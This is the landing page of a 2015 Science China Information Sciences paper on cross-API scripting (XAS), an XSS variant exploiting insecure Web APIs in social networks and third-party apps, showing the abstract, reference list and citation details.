Abstract
With the rapid development of online social networks, various Web application programming interfaces (APIs) on social platforms are released to share profitable social data with all kinds of third-party online services. However, it also brings new risks to social networks once Web APIs are insecurely designed, implemented, and invoked. The focused topic in this paper is security analysis of a new type of cross-site scripting (XSS) which is based on Web APIs in new complicated social ecosystems which consist of social networks, third-party apps, and other online services. In this paper, we refer to Web API-based XSS as cross-API scripting (XAS). For the first time, we take typical XAS attacks in diversified context as cases to demonstrate the new exploiting opportunities and threats in social ecosystems. Also, we design a tool to identify the design and implementation flaws of Web APIs in 11 popular social networks. We discover several security flaws of API via our experiment. According to the results, we conclude causes of XAS flaws in depth. We also examined 143 Web-based apps and verified the prevalence of XAS flaws. Finally, we proposed preliminary measures both in social networks and third-party applications to alleviate XAS.
Similar content being viewed by others
References
Roy T F. Architectural styles and the design of network-based software architectures. Doctoral Dissertation, University of California, Irvine, 2000
Ryan N. Twitter API ripe for abuse by web worms. 2009. Online available at: http://www.zdnet.com/blog/security/twitter-api-ripe-for-abuse-by-web-worms/3451
Softpedia.com News. Facebook mobile API XSS vulnerability used to launch spam worm. 2011. Online available at: http://cyberinsecure.com/facebook-mobile-api-xss-vulnerability-used-to-launch-spam-worm/
Amol N. Exploitation of “self-only” Cross-Site Scripting in Google code. 2011. Online available at: http://www.exploitdb.com/downloadpdf/17017/
Hristo B, Elie B, Dan B. XCS: Cross channel scripting and its impact on web applications. In: Proceedings of the 16th ACM Conference on Computer and Communications Security, Chicago, 2009. 420–431
Adam B, Adrienne P F, Prateek S, et al. Protecting browsers from extension vulnerabilities. In: Proceedings of the Network and Distributed System Security Symposium, San Diego, 2010
Opera. Opera extensions: Quick documentation overview. 2010. Online available at: http://dev.opera.com/articles/view/opera-extensions-quick-documentation-overview/
Taras I. Web application vulnerabilities in context of browser extensions. 2011. Online available at: http://oxdef.info/papers/ext/chrome.html
Liu L, Zhang X W, Yan G H, et al. Chrome extensions: Threat analysis and countermeasures. In: Proceedings of the Network and Distributed System Security Symposium (NDSS), 2012
Roberto S L. Cross context scripting with Firefox. Security-Assessment.com White Paper, 2010
Robert H, Tom S. Xploiting Google gadgets: Gmailware and beyond. In: Black Hat 2008 USA, Las Vegas, 2008
Jason A. Why Facebook should police their API. 2011. Online available at: http://www.bandwidthblog.com/2011/05/05/why-facebook-should-police-their-api/
Mark A, Dirk B, Darren B, et al. OAuth Core 1.0 Revision A. 2009. Online available at: http://oauth.net/core/1.0a/
Hammer-Lahav E. RFC 5849, The OAuth 1.0 Protocol. 2010. Online available at: http://tools.ietf.org/html/rfc5849
Hammer-Lahav E. The OAuth 2.0 Authorization Protocol. 2011. Online available at: http://tools.ietf.org/html/draftietf-oauth-v2-22
Mike T L, Venkatakrishnan V N. BLUEPRINT-robust prevention of cross-site scripting attacks for existing browsers. In: Proceedings of the 30th IEEE Symposium on Security & Privacy, 2009
Yacin N, Prateek S, Dawn S. Document structure integrity: A robust basis for cross-site scripting defense. In: Proceedings of the 16th Annual Network & Distributed System Security Symposium (NDSS), CA, 2009
Matthew V G, Chen H. Noncespaces: Using randomization to enforce information flow tracking and thwart cross-site scripting attacks. In: Proceedings of the 16th Annual Network & Distributed System Security Symposium (NDSS), San Diego, CA, 2009
Prithvi B, Venkatakrishnan V N. XSS-GUARD: Precise dynamic prevention of cross-site scripting attacks. In: Proceedings of the 5th Conference on Detection of Intrusions and Malware & Vulnerability Assessment, Paris, 2008. 23–43
Lin J C, Chen J M. The automatic defense mechanism for malicious injection attack. In: Proceedings of 7th International Conference on Computer and Information Technology, Fukushima, 2007. 709–714
Martin J, Bjorn E, Joachim P. XSSDS: Server-side detection of cross-site scripting attacks. In: Proceedings of the 2008 Annual Computer Security Applications Conference, Anaheim, 2008. 335–344
Joel W, Prateek S, Devdatta A, et al. A systematic analysis of XSS sanitization in web application frameworks. In: Proceedings of the 16th European Symposium on Research in Computer Security (ESORICS), 2011
Theodoor S, Davide B, Engin K. Quo Vadis? A study of the evolution of input validation vulnerabilities in web applications, 2011, http://www.iseclab.org/papers/vuln_fcds.pdf
Saxena P, Akhawe D, Hanna S, et al. A symbolic execution framework for javascript. In: Proceedings of the 2010 IEEE Symposium on Security and Privacy, 2010
Saxena P, Hanna S, Poosankam P, et al. FLAX: Systematic discovery of client-side validation vulnerabilities in rich web applications. In: Proceedings of 17th Annual Network & Distributed System Security Symposium, 2010
Mohammad R F, Hossein S. Social Networks’ XSS worms. In: Proceedings of the International Conference on Computational Science and Engineering, 2009
Sun F Q, Xu L, Su Z D. Client-side detection of XSS worms by monitoring payload propagation. In: Proceedings of the 14th European Conference on Research in Computer Security, Saint-Malo, 2009. 539–554
Adrienne F, David E. Privacy protection for social network APIs. In: Proceedings of the IEEE Web 2.0 Security and Privacy Workshop (W2SP), 2008
Kapil S, Sumeer B, Wenke L. xBook: Redesigning privacy control in social network platforms. In: Proceedings of the 18th USENIX Security Symposium, 2009
Wang R, Chen S, Wang X F, et al. How to shop for free online: Security analysis of cashier-as-a-service based web stores. In: Proceedings of the 32nd IEEE Symposium on Security & Privacy, 2011
Xing L Y, Chen Y Y, Wang X F, et al. InteGuard: Toward automatic protection of third-party web service integrations. In: Proceedings of 20th Annual Network & Distributed System Security Symposium, 2013
Author information
Authors and Affiliations
Corresponding author
Rights and permissions
About this article
Cite this article
Zhang, Y., Liu, Q., Luo, Q. et al. XAS: Cross-API scripting attacks in social ecosystems. Sci. China Inf. Sci. 58, 1–14 (2015). https://doi.org/10.1007/s11432-014-5145-1
Received:
Accepted:
Published:
Issue Date:
DOI: https://doi.org/10.1007/s11432-014-5145-1